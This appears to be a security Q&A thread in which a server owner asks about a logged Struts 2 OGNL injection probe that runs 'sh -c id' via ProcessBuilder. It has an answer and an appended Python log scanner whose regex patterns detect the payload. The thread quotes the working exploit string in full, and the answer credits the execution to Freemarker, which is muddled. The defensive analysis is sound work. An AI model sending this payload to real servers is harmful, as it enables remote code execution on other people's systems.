What is this hacker trying to do with this Java code?


Problem description


In my server log of my web server, I've noticed a hacker trying this:

https://[domain name]/index.action?action:${%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]{'sh','-c','id'})).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27),%23matt.getwriter().println(%23e),%23matt.getwriter().flush(),%23matt.getwriter().close()}

Which URL decodes to this:

https://[domain name]/index.action?action:${#a=(new java.lang.processbuilder(new java.lang.string[]{'sh','-c','id'})).start(),#b=#a.getinputstream(),#c=new java.io.inputstreamreader(#b),#d=new java.io.bufferedreader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#matt.getwriter().println(#e),#matt.getwriter().flush(),#matt.getwriter().close()}

My server doesn't use Java but I'm trying to understand what this hacker is trying to do here and why this could be a vulnerability. After all, I'm not just a developer but also need to know about how to protect a server, including servers not set up by me.

The code seems to start a new process and then tries to read data from the input stream. I'm assuming this is the input stream of the current web session.

As this attack is also tried over /login.action and various other URLs and different Java code, I am considering it to be potentially dangerous. But I can't explain why this is dangerous.

The specific domain is under attack right now as the hacker tries to see if it's running WordPress or Magenta or other known systems and also tries several different attacks.

But what matters is this: the domain is currently under development and the owner still has to decide which development tools will be used. The choices are between Java and ASP-NET, so is this attack dangerous if he chooses to pick Java?

Solution

It's trying to exploit an RCE vulnerability in Struts 2, I think this one. A bad one: Freemarker would execute any code inside ${} tags.

The Freemarker code starts a process to execute id to see if the server is running as root, giving full access to the box. Even a vulnerable Struts version might not be too bad here, since the attacker might not be interested unless you were root.

The attacker's program has a lot of these old vulnerabilities that would work on very unsafe servers, but even a simple admin protocol will protect against these amateur attacks. You would only be vulnerable when running as root, using an old version of software, opening up your db server to the internet with a weak or default password, etc.

Regardless of the technology you choose, there will be security issues and you need to follow the CVEs. For example, a modern Java framework like Spring has a few, but remote code execution is quite rare, and that's what those attack programs look for.
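A defender-side check for the probe discussed in this thread, added here as an example that is not part of the question or the answer: it URL-decodes each request target from combined-format access log lines and flags the markers of this payload, the injected `${#...}` expression, the ProcessBuilder spawn of `sh -c`, and the write-back through the `xwork2.dispatcher.HttpServletResponse` object. The log lines, addresses, timestamps and status codes are constructed; only the request target is the one quoted in the question.

```python
import re
from urllib.parse import unquote

# Each regex is one marker of the payload quoted in the question: an OGNL
# expression injected into the query string, a ProcessBuilder spawn, a shell
# invocation, and the write-back through the Struts 2 response object.
INDICATORS = {
    "ognl_expression": re.compile(r"\$\{\s*#"),
    "process_spawn": re.compile(r"java\.lang\.(?:processbuilder|runtime)", re.I),
    "shell_command": re.compile(r"['\"](?:sh|bash|cmd)['\"]\s*,\s*['\"]-c['\"]", re.I),
    "struts_response": re.compile(r"xwork2\.dispatcher\.httpservletresponse", re.I),
}

def decode_request_target(target):
    """Strip percent-encoding twice; scanners sometimes double-encode to evade naive filters."""
    return unquote(unquote(target))

def classify_request(target):
    """Return the indicator names present in one decoded request target (empty if benign)."""
    decoded = decode_request_target(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

# Combined-format access log line: client, ident, user, [timestamp], "METHOD target proto", status
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def scan_access_log(lines):
    """Return (client ip, status, indicators) for every line whose target trips an indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        found = classify_request(m.group("target"))
        if found:
            hits.append((m.group("ip"), m.group("status"), found))
    return hits

# Constructed sample log: the first target is the payload from the question (as it
# appears in the log, percent-encoded), the other two are ordinary traffic.
PAYLOAD_TARGET = "/index.action?action:${%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]{'sh','-c','id'})).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27),%23matt.getwriter().println(%23e),%23matt.getwriter().flush(),%23matt.getwriter().close()}"
SAMPLE_LOG = [
    f'203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET {PAYLOAD_TARGET} HTTP/1.1" 404 196',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '198.51.100.8 - - [10/Oct/2023:13:55:41 +0000] "GET /search?q=%24%7Bprice%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, status, found in scan_access_log(SAMPLE_LOG):
        print(f"{ip} status={status} indicators={found}")
```

Note that `#a.getInputStream()` in the payload is the standard output of the spawned process, not the web session's input, which is why the result of `id` would be echoed back in the HTTP response on a vulnerable Struts 2 host. The third sample line shows why the check requires the `${#` prefix rather than any `${`: a template-looking parameter in ordinary traffic is not flagged.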
